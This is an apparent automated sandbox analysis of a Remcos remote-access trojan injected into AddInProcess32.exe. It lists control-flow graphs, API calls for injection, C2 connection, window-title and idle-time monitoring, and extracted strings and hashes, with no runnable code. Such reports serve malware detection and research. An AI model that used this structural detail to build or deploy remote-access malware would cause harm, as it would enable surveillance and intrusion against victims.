                                                                                  control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c0 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 100 40d5c5-40d5c9 70->100 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 91 40d991-40d99a call 401fb8 80->91 92 40d67f-40d686 80->92 101 40d622-40d63f call 401f8b call 411f34 81->101 102 40d60f-40d61c WaitForSingleObject CloseHandle 81->102 109 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 91->109 96 40d688 92->96 97 40d68a-40d6a7 GetModuleFileNameW call 4192ae 92->97 96->97 107 40d6b0-40d6b4 97->107 108 40d6a9-40d6ab 97->108 100->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 100->105 122 40d651 101->122 123 40d641-40d650 call 401f8b call 41239a 101->123 102->101 137 40dd2c 105->137 113 40d6b6-40d6c9 call 401e45 call 401f8b 107->113 114 40d717-40d72a call 401e45 call 401f8b 107->114 108->107 175 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 109->175 113->114 142 40d6cb-40d6d1 113->142 138 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 114->138 139 40d72c call 40e501 114->139 122->80 123->122 143 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 137->143 217 40d815-40d819 138->217 218 40d7af-40d7c8 call 401e45 call 401f8b call 439891 138->218 139->138 142->114 148 40d6d3-40d6d9 142->148 188 40dd6a-40dd6f call 413980 143->188 153 40d6f7-40d710 call 401f8b call 411eea 148->153 154 40d6db-40d6ee call 4060ea 148->154 153->114 179 40d712 call 4066a6 153->179 154->114 166 40d6f0-40d6f5 call 4067a0 154->166 166->114 220 40da61-40da63 175->220 221 40da65-40da67 175->221 179->114 217->109 219 40d81f-40d826 217->219 218->217 247 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 218->247 223 40d8a7-40d8b1 call 408093 219->223 224 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 219->224 225 40da6b-40da7c call 41aa4f CreateThread 220->225 226 40da69 221->226 227 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 221->227 236 40d8b6-40d8de call 40245c call 43254d 223->236 224->236 225->227 226->225 349 40db83-40db9a call 401e45 call 401f8b 227->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 227->350 255 40d8f0 236->255 256 40d8e0-40d8ee call 434c30 236->256 247->217 262 40d8f2-40d93d call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 255->262 256->262 316 40d942-40d967 call 432556 call 401e45 call 40fbab 262->316 316->175 332 40d96d-40d98c call 401e45 call 419bca call 40de34 316->332 332->175 345 40d98e-40d990 332->345 345->91 360 40dbd9-40dbeb call 401e45 call 401f8b 349->360 361 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->361 350->349 372 40dc4c-40dc5e call 401e45 call 401f8b 360->372 373 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 360->373 361->360 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 372->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 372->384 373->372 383->384 406 40dcc1-40dcc2 SetProcessDEPPolicy 384->406 407 40dcc4-40dcd7 CreateThread 384->407 406->407 408 40dce5-40dcec 407->408 409 40dcd9-40dce3 CreateThread 407->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->137 416 40dd03-40dd06 412->416 413->412 416->188 418 40dd08-40dd0d 416->418 418->143
                                                                                  APIs
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                    • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                    • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                    • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                                                                    • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                                                                  • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                                                                  • API String ID: 1529173511-2670159127
                                                                                  • Opcode ID: 1e66b8a834fdcbb60039c45ecf35caf02187703de468e50489cd24c9998f40f4
                                                                                  • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                                                                  • Opcode Fuzzy Hash: 1e66b8a834fdcbb60039c45ecf35caf02187703de468e50489cd24c9998f40f4
                                                                                  • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E
                                                                                  Function 00413980 Relevance: 37.5, APIs: 5, Strings: 16, Instructions: 785sleepnetworkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 466 413980-4139c8 call 4020bf call 419894 call 4020bf call 401e45 call 401f8b call 439867 479 4139d7-413a23 call 402073 call 401e45 call 4020d6 call 419d87 call 40487e call 401e45 call 40fbab 466->479 480 4139ca-4139d1 Sleep 466->480 495 413a25-413a94 call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 40471d 479->495 496 413a97-413b32 call 402073 call 401e45 call 4020d6 call 419d87 call 401e45 * 2 call 40822a call 402ef0 call 401fc2 call 401fb8 * 2 call 401e45 call 405ae5 479->496 480->479 495->496 549 413b42-413b49 496->549 550 413b34-413b40 496->550 551 413b4e-413be0 call 405a86 call 4052fe call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 2 call 401e45 call 401f8b call 401e45 call 401f8b call 41393f 549->551 550->551 578 413be2-413c26 WSAGetLastError call 41a86b call 4052dd call 402073 call 4194da call 401fb8 551->578 579 413c2b-413c39 call 40480d 551->579 602 414493-4144a5 call 404e06 call 4021da 578->602 585 413c66-413c74 call 404f31 call 4048a8 579->585 586 413c3b-413c61 call 402073 * 2 call 4194da 579->586 598 413c79-413c7b 585->598 586->602 601 413c81-413dd4 call 401e45 * 2 call 4052fe call 408209 call 402ef0 call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 4 call 4197c1 call 413013 call 408098 call 43f34f call 401e45 call 4020d6 call 40245c call 401f8b * 2 call 4120e8 598->601 598->602 666 413dd6-413de3 call 405a86 601->666 667 413de8-413e0f call 401f8b call 411f91 601->667 614 4144a7-4144c7 call 401e45 call 401f8b call 439867 Sleep 602->614 615 4144cd-4144d5 call 401e6d 602->615 614->615 615->496 666->667 673 413e11-413e13 667->673 674 413e16-414406 call 40415e call 419c8a call 419b16 call 401e45 GetTickCount call 419b16 call 419ac6 call 419b16 call 419a77 call 419c8a * 5 call 40e2bb call 419c8a call 402f11 call 402e81 call 402ef0 call 402e81 call 402ef0 * 3 call 402e81 call 402ef0 call 408209 call 402ef0 call 408209 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 40826c call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408209 call 402ef0 * 5 call 402e81 call 402ef0 call 402e81 call 402ef0 * 6 call 404a81 call 401fb8 * 48 call 401ee9 call 401fb8 * 4 call 401ee9 call 404bf0 667->674 673->674 902 414408-41440f 674->902 903 41441a-414421 674->903 902->903 904 414411-414413 902->904 905 414423-414428 call 409f9a 903->905 906 41442d-41445f call 405a4b call 402073 * 2 call 4194da 903->906 904->903 905->906 917 414461-41446d CreateThread 906->917 918 414473-41448e call 401fb8 * 2 call 401ee9 906->918 917->918 918->602
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000,00000029,75920F10,00471FFC,00000000), ref: 004139D1
                                                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
                                                                                  • Sleep.KERNELBASE(00000000,00000002), ref: 004144C7
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                  • String ID: | $%I64u$3.8.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$H"G$TLS Off$TLS On $`"G$hlight$name$!G
                                                                                  • API String ID: 524882891-3814560791
                                                                                  • Opcode ID: d601f5427b71b8bebfdd2cdf66b2cc0c2884c600b77c3aa14ce07a42c2b727ff
                                                                                  • Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
                                                                                  • Opcode Fuzzy Hash: d601f5427b71b8bebfdd2cdf66b2cc0c2884c600b77c3aa14ce07a42c2b727ff
                                                                                  • Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D
                                                                                  Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1059 4048a8-4048c8 connect 1060 4049fb-4049ff 1059->1060 1061 4048ce-4048d1 1059->1061 1064 404a01-404a0f WSAGetLastError 1060->1064 1065 404a77 1060->1065 1062 4049f7-4049f9 1061->1062 1063 4048d7-4048da 1061->1063 1066 404a79-404a7e 1062->1066 1067 404906-404910 call 41ea15 1063->1067 1068 4048dc-404903 call 4052fe call 402073 call 4194da 1063->1068 1064->1065 1069 404a11-404a14 1064->1069 1065->1066 1078 404921-40492e call 41ec44 1067->1078 1079 404912-40491c 1067->1079 1068->1067 1072 404a51-404a56 1069->1072 1073 404a16-404a4f call 41a86b call 4052dd call 402073 call 4194da call 401fb8 1069->1073 1075 404a5b-404a74 call 402073 * 2 call 4194da 1072->1075 1073->1065 1075->1065 1093 404930-404953 call 402073 * 2 call 4194da 1078->1093 1094 404967-404972 call 41f7f5 1078->1094 1079->1075 1122 404956-404962 call 41ea55 1093->1122 1105 4049a4-4049b1 call 41ebbb 1094->1105 1106 404974-4049a2 call 402073 * 2 call 4194da call 41ee67 1094->1106 1116 4049b3-4049d6 call 402073 * 2 call 4194da 1105->1116 1117 4049d9-4049f4 CreateEventW * 2 1105->1117 1106->1122 1116->1117 1117->1062 1122->1065
                                                                                  APIs
                                                                                  • connect.WS2_32(?,?,?), ref: 004048C0
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                                                                  • WSAGetLastError.WS2_32 ref: 00404A01
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                  • API String ID: 994465650-2151626615
                                                                                  • Opcode ID: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                                                                  • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                                                                  • Opcode Fuzzy Hash: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                                                                  • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                                                                                  Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                                                                  • closesocket.WS2_32(000000FF), ref: 00404E3A
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                  • String ID:
                                                                                  • API String ID: 3658366068-0
                                                                                  • Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                                                                  • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                                                                  • Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                                                                  • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58
                                                                                  Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 00409C81
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 00409C8C
                                                                                  • GetForegroundWindow.USER32 ref: 00409C92
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                  • API String ID: 911427763-3954389425
                                                                                  • Opcode ID: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
                                                                                  • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                                                                                  • Opcode Fuzzy Hash: ee9b949ba4685117d773663a634f46785a27bf3fcb47f19481d588488b50e058
                                                                                  • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                                                                                  Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1231 40c5ed-40c612 call 401f66 1234 40c618 1231->1234 1235 40c73c-40c762 call 401ee4 GetLongPathNameW call 40415e 1231->1235 1236 40c711-40c716 1234->1236 1237 40c654-40c659 1234->1237 1238 40c727 1234->1238 1239 40c718-40c71d call 439e5f 1234->1239 1240 40c629-40c637 call 41959f call 401ef3 1234->1240 1241 40c64a-40c64f 1234->1241 1242 40c70a-40c70f 1234->1242 1243 40c65e-40c665 call 419f23 1234->1243 1244 40c61f-40c624 1234->1244 1256 40c767-40c7d4 call 40415e call 40c7f9 call 402f85 * 2 call 401ee9 * 5 1235->1256 1247 40c72c-40c731 call 439e5f 1236->1247 1237->1247 1238->1247 1253 40c722-40c725 1239->1253 1265 40c63c 1240->1265 1241->1247 1242->1247 1257 40c667-40c6b7 call 40415e call 439e5f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1243->1257 1258 40c6b9-40c705 call 40415e call 439e5f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1243->1258 1244->1247 1259 40c732-40c737 call 408093 1247->1259 1253->1238 1253->1259 1270 40c640-40c645 call 401ee9 1257->1270 1258->1265 1259->1235 1265->1270 1270->1235
                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LongNamePath
                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                  • API String ID: 82841172-425784914
                                                                                  • Opcode ID: 785619835b5c11a1d33be1ed114f431dd3e75497d1190346e302d6452478282e
                                                                                  • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                                                                  • Opcode Fuzzy Hash: 785619835b5c11a1d33be1ed114f431dd3e75497d1190346e302d6452478282e
                                                                                  • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                                                                                  Function 0040971E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 00409738
                                                                                    • Part of subcall function 0040966D: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                                                                    • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                                                                    • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                                                                    • Part of subcall function 0040966D: CloseHandle.KERNELBASE(00000000,?,?,?,00409745), ref: 004096E6
                                                                                  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00409774
                                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 00409785
                                                                                  • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040979C
                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                  • String ID: H"G$H"G
                                                                                  • API String ID: 3795512280-1424798214
                                                                                  • Opcode ID: d4054b3541c9de0bb886707d1330939cd573338eb007fed7dc332b33fd2e5bf0
                                                                                  • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                                                                  • Opcode Fuzzy Hash: d4054b3541c9de0bb886707d1330939cd573338eb007fed7dc332b33fd2e5bf0
                                                                                  • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                                                                  Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1475 4192ae-419305 call 419f23 call 411f91 call 401fc2 call 401fb8 call 4060ea 1486 419307-419316 call 411f91 1475->1486 1487 419348-419351 1475->1487 1492 41931b-419332 call 401f8b StrToIntA 1486->1492 1488 419353-419358 1487->1488 1489 41935a 1487->1489 1491 41935f-41936a call 40535d 1488->1491 1489->1491 1497 419340-419343 call 401fb8 1492->1497 1498 419334-41933d call 41accf 1492->1498 1497->1487 1498->1497
                                                                                  APIs
                                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                                                                    • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                    • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                    • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                                                                  • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                  • API String ID: 1866151309-2070987746
                                                                                  • Opcode ID: a9ed1e27cb49339d9708016e5b42a83d8130e16acda5329866ded5bcd5a368f5
                                                                                  • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                                                                  • Opcode Fuzzy Hash: a9ed1e27cb49339d9708016e5b42a83d8130e16acda5329866ded5bcd5a368f5
                                                                                  • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                                                                                  Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
